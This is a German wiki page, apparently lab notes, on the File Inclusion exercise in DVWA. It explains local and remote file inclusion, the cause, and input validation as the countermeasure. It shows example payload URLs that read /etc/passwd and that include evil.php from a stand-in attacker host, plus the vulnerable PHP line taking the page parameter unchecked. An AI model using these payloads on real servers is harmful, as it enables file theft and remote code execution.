DVWA File Inclusion: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 16: | Zeile 16: | ||
<?php | <?php | ||
| − | |||
$file = $_GET[ 'page' ]; | $file = $_GET[ 'page' ]; | ||
... | ... | ||
Version vom 15. Juni 2021, 13:42 Uhr
- Tritt auf, wenn der Client die Möglichkeit hat, Dateien mitzugeben, die der Server einbindet.
Local File Inclusion
- Ausführen einer Datei, die lokal auf dem Server vorliegt.
- z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd (oder auch ...?page=/etc/passwd)
Remote File Inclusion
- Download und Ausführen einer Datei von extern.
- z.Bsp. Anpassen der URL: ...?page=http://www.evilsite.com/evil.php
Ursache
- Verwendung von Variablen die von Außen verändert werden können ohne Kontrolle oder Einschränkung.
- z. Bsp. PHP:
<?php $file = $_GET[ 'page' ]; ...
Gegenmassnahmen
- Kontrolle aller Daten, die von Aussen kommen. Niemals direkte Verwendung dieser Daten / Variablen.